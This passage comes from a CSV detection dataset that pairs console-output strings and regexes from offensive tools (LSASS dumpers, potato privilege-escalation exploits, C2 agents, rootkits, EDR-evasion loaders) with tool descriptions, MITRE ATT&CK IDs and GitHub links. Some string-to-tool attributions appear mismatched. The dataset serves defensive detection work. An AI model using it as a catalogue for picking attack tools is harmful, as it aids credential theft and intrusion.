tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*[+] Scanning computers list on SMB port *",".{0,1000}\[\+\]\sScanning\scomputers\slist\son\sSMB\sport\s.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*[+] security evtx file handle unlock succ*",".{0,1000}\[\+\]\ssecurity\sevtx\sfile\shandle\sunlock\ssucc.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*[+] Seems like the creds are valid: * :: * on *",".{0,1000}\[\+\]\sSeems\slike\sthe\screds\sare\svalid\:\s.{0,1000}\s\:\:\s.{0,1000}\son\s.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*[+] SeImpersonatePrivilege enabled*",".{0,1000}\[\+\]\sSeImpersonatePrivilege\senabled.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","117","14","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*[+] Sending S4U2proxy request to domain controller *",".{0,1000}\[\+\]\sSending\sS4U2proxy\srequest\sto\sdomain\scontroller\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Sending S4U2proxy request via KDC proxy: *",".{0,1000}\[\+\]\sSending\sS4U2proxy\srequest\svia\sKDC\sproxy\:\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Sending S4U2proxy request via KDC proxy:*",".{0,1000}\[\+\]\sSending\sS4U2proxy\srequest\svia\sKDC\sproxy\:.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Sending S4U2self request to *",".{0,1000}\[\+\]\sSending\sS4U2self\srequest\sto\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Sending S4U2self request via KDC proxy:*",".{0,1000}\[\+\]\sSending\sS4U2self\srequest\svia\sKDC\sproxy\:.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Server connected to our evil RPC pipe*",".{0,1000}\[\+\]\sServer\sconnected\sto\sour\sevil\sRPC\spipe.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*[+] Shellcode Injected Successfully*",".{0,1000}\[\+\]\sShellcode\sInjected\sSuccessfully.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*[+] Shoggoth engine is initiated!*",".{0,1000}\[\+\]\sShoggoth\sengine\sis\sinitiated!.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*[+] SID added to msDS-AllowedToActOnBehalfOfOtherIdentity*",".{0,1000}\[\+\]\sSID\sadded\sto\smsDS\-AllowedToActOnBehalfOfOtherIdentity.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*[+] SMB reflected DCOM authentication succeeded!*",".{0,1000}\[\+\]\sSMB\sreflected\sDCOM\sauthentication\ssucceeded!.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*[+] SMB reflected DCOM authentication succeeded!*",".{0,1000}\[\+\]\sSMB\sreflected\sDCOM\sauthentication\ssucceeded!.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*[+] SMBRemoting and WMIRemoting Loaded*",".{0,1000}\[\+\]\sSMBRemoting\sand\sWMIRemoting\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Spawning root shell*",".{0,1000}\[\+\]\sSpawning\sroot\sshell.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*[+] Spawning SYSTEM shell*",".{0,1000}\[\+\]\sSpawning\sSYSTEM\sshell.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*[+] Starting pspy now*",".{0,1000}\[\+\]\sStarting\spspy\snow.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*[+] Stole token from*",".{0,1000}\[\+\]\sStole\stoken\sfrom.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*[+] Success! LD_PRELOAD has been added!*",".{0,1000}\[\+\]\sSuccess!\sLD_PRELOAD\shas\sbeen\sadded!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*[+] Successful allocated remote memory: lpRemoteLibraryBuffer:[*",".{0,1000}\[\+\]\sSuccessful\sallocated\sremote\smemory\:\slpRemoteLibraryBuffer\:\[.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*[+] Successful change protection: RW -> RX*",".{0,1000}\[\+\]\sSuccessful\schange\sprotection\:\sRW\s\-\>\sRX.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*[+] Successful copied dll buffer*",".{0,1000}\[\+\]\sSuccessful\scopied\sdll\sbuffer.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*[+] Successful injected DLL: hThread:*",".{0,1000}\[\+\]\sSuccessful\sinjected\sDLL\:\shThread\:.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*[+] successfully breached the mainframe as real-PID *",".{0,1000}\[\+\]\ssuccessfully\sbreached\sthe\smainframe\sas\sreal\-PID\s.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*[+] Successfully downloaded GPO from fakedc to *",".{0,1000}\[\+\]\sSuccessfully\sdownloaded\sGPO\sfrom\sfakedc\sto\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*[+] Successfully downloaded legitimate GPO from SYSVOL to *",".{0,1000}\[\+\]\sSuccessfully\sdownloaded\slegitimate\sGPO\sfrom\sSYSVOL\sto\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*[+] Successfully injected malicious scheduled task*",".{0,1000}\[\+\]\sSuccessfully\sinjected\smalicious\sscheduled\stask.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*[+] Successfully injected malicious scheduled task*",".{0,1000}\[\+\]\sSuccessfully\sinjected\smalicious\sscheduled\stask.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*[+] Successfully retrieved an access token for User:*",".{0,1000}\[\+\]\sSuccessfully\sretrieved\san\saccess\stoken\sfor\sUser\:.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*[+] successfully self destructed server*",".{0,1000}\[\+\]\ssuccessfully\sself\sdestructed\sserver.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*[+] Successfully spoofed GPC gPCFileSysPath attribute*",".{0,1000}\[\+\]\sSuccessfully\sspoofed\sGPC\sgPCFileSysPath\sattribute.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*[+] Successfully spoofed gPLink for OU *",".{0,1000}\[\+\]\sSuccessfully\sspoofed\sgPLink\sfor\sOU\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*[+] Successfully updated extension names of fakedc GPO*",".{0,1000}\[\+\]\sSuccessfully\supdated\sextension\snames\sof\sfakedc\sGPO.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*[+] Successfully uploaded GPO to SMB server *",".{0,1000}\[\+\]\sSuccessfully\suploaded\sGPO\sto\sSMB\sserver\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*[+] Sucessfully Dumped Process!*",".{0,1000}\[\+\]\sSucessfully\sDumped\sProcess!.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*[+] Suitable Handle to LSASS Found from PID: *",".{0,1000}\[\+\]\sSuitable\sHandle\sto\sLSASS\sFound\sfrom\sPID\:\s.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*[+] SysWhispers is not compatible with Obfuscator-LLVM; switching to GetSyscallStub*",".{0,1000}\[\+\]\sSysWhispers\sis\snot\scompatible\swith\sObfuscator\-LLVM\;\sswitching\sto\sGetSyscallStub.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] SysWhispers is not compatible with Obfuscator-LLVM; switching to GetSyscallStub*",".{0,1000}\[\+\]\sSysWhispers\sis\snot\scompatible\swith\sObfuscator\-LLVM\;\sswitching\sto\sGetSyscallStub.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] task has been created successfully ..!*",".{0,1000}\[\+\]\stask\shas\sbeen\screated\ssuccessfully\s\s\.\.!.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*[+] The 1$a$$.exe*",".{0,1000}\[\+\]\sThe\s1\$a\$\$\.exe.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*[+] The DLL has been injected into ngentask.exe via DLL Side-Loading*",".{0,1000}\[\+\]\sThe\sDLL\shas\sbeen\sinjected\sinto\sngentask\.exe\svia\sDLL\sSide\-Loading.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","0","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" "*[+] The encrypted payload with *",".{0,1000}\[\+\]\sThe\sencrypted\spayload\swith\s.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*[+] The scheduled task is hidden and invisible now*",".{0,1000}\[\+\]\sThe\sscheduled\stask\sis\shidden\sand\sinvisible\snow.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*[+] Thread hijacking successful*",".{0,1000}\[\+\]\sThread\shijacking\ssuccessful.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*[+] Thread hijacking successful*",".{0,1000}\[\+\]\sThread\shijacking\ssuccessful.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*[+] Token-Impersonation Loaded*",".{0,1000}\[\+\]\sToken\-Impersonation\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Triggering name pipe access on evil PIPE *",".{0,1000}\[\+\]\sTriggering\sname\spipe\saccess\son\sevil\sPIPE\s.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*[+] Unhooking the NTDLL for Process with PID *",".{0,1000}\[\+\]\sUnhooking\sthe\sNTDLL\sfor\sProcess\swith\sPID\s.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*[+] Unhooking the NTDLL from PID * completed successfully.*",".{0,1000}\[\+\]\sUnhooking\sthe\sNTDLL\sfrom\sPID\s.{0,1000}\scompleted\ssuccessfully\..{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*[+] Updated Elevated HKLM:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon key UserInit*",".{0,1000}\[\+\]\sUpdated\sElevated\sHKLM\:Software\\\\Microsoft\\\\Windows\sNT\\\\CurrentVersion\\\\Winlogon\skey\sUserInit.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*[+] Use -info to get stack status and the enpoint url of catspin*",".{0,1000}\[\+\]\sUse\s\-info\sto\sget\sstack\sstatus\sand\sthe\senpoint\surl\sof\scatspin.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*[+] User hash stolen!*",".{0,1000}\[\+\]\sUser\shash\sstolen!.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*[+] Using DLL enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sDLL\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Using DLL enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sDLL\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Using DLL enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sDLL\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Using domain enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sdomain\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*[+] Using domain enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sdomain\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Using domain enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sdomain\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense 